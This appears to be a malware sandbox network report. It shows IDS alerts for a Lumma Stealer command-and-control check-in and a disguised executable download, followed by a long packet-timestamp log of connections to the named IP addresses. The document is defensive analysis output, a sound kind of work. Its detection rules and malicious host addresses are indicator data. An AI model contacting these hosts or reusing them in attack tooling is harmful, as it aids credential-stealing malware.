| 2025-01-06T12:16:53.072951+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49910 | 104.21.44.159 | 443 | TCP |
| 2025-01-06T12:16:53.792055+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49920 | 185.161.251.21 | 443 | TCP |
| 2025-01-06T12:16:54.558874+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49927 | 172.67.208.58 | 443 | TCP |
| 2025-01-06T12:16:55.007739+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 172.67.208.58 | 443 | 192.168.2.5 | 49927 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841027975 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841039896 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841048002 CET49846443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:43.841053963 CET44349846104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026288033 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026330948 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026421070 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026673079 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.026686907 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.508439064 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.508616924 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509675980 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509687901 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.509962082 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511064053 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511212111 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:44.511244059 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040587902 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040673971 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040935040 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.040935040 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087043047 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087090969 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087192059 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087501049 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.087513924 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.348366976 CET49853443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.348404884 CET44349853104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.563982010 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.564060926 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565241098 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565253019 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.565494061 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566744089 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566906929 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566932917 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.566987991 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:45.611329079 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.024979115 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.025067091 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.025137901 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.025289059 CET49860443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.025304079 CET44349860104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.223263979 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.223298073 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.223577976 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.223895073 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.223905087 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.693370104 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.693463087 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.694663048 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.694670916 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.694890976 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.696041107 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.696209908 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.696239948 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.696304083 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:46.696311951 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.293013096 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.293103933 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.293251991 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.293411970 CET49867443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.293426991 CET44349867104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.675720930 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.675764084 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.675825119 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.679611921 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:47.679625988 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.136576891 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.136642933 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.137825012 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.137834072 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.138040066 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.141899109 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.141988039 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.142038107 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.650619984 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.650712967 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.650780916 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.650929928 CET49877443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.650934935 CET44349877104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.708008051 CET49888443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.708043098 CET44349888104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.708174944 CET49888443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.708492041 CET49888443192.168.2.5104.21.44.159
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:48.708506107 CET44349888104.21.44.159192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.830826044 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.830868959 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.830884933 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.830910921 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.830924988 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.831295013 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.831360102 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.831398010 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.879611015 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.879620075 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918802023 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918855906 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918888092 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918895960 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918937922 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918943882 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918948889 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918987036 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.918992996 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919744968 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919770956 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919785976 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919794083 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919847012 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.919861078 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920489073 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920515060 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920552969 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920558929 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920593977 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920597076 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920679092 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920979977 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.920984983 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921435118 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921526909 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921559095 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921560049 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921567917 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:54.921602011 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007757902 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007869005 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007917881 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007949114 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007961035 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.007982969 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008088112 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008115053 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008127928 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008142948 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008147001 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008193016 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008272886 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008426905 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008472919 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008477926 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008521080 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008646011 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008692980 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008702993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008747101 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008753061 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.008800030 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.009226084 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.009272099 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.009429932 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.009480000 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.010153055 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.010206938 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.010318995 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.010369062 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.011054039 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.011104107 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.011162996 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.011210918 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.048146009 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.048219919 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.095791101 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.095853090 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.095938921 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.095994949 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.096112967 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.096170902 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.096271992 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.096326113 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.096612930 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275748014 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275764942 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275799036 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275804043 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275825977 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.275849104 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276344061 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276360035 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276413918 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276426077 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276432037 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276467085 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.276500940 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361568928 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361588001 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361654043 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361691952 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361706018 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.361797094 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362060070 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362076998 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362126112 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362133026 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362181902 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362351894 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362658978 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362673998 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362735033 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362740993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.362792015 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363168955 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363193989 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363235950 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363240957 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363265991 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363284111 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363723993 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363739967 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363784075 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363789082 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363812923 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.363832951 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364262104 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364276886 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364326954 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364331007 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364352942 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364370108 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364654064 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364669085 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364710093 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364713907 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364737988 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.364748955 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365531921 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365547895 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365598917 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365603924 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.365652084 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450051069 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450069904 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450113058 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450119972 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450136900 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450170040 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450671911 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450690031 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450731039 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450741053 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450763941 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.450776100 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451190948 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451237917 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451252937 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451258898 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451281071 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451302052 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451683044 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451697111 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451741934 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451746941 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.451786041 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452528954 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452547073 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452584028 CET44349927172.67.208.58192.168.2.5
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.452584982 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.750237942 CET49927443192.168.2.5172.67.208.58
                                                                                                                                                                                                                                                              Jan 6, 2025 12:16:55.764302015 CET44349927172.67.208.58192.168.2.5
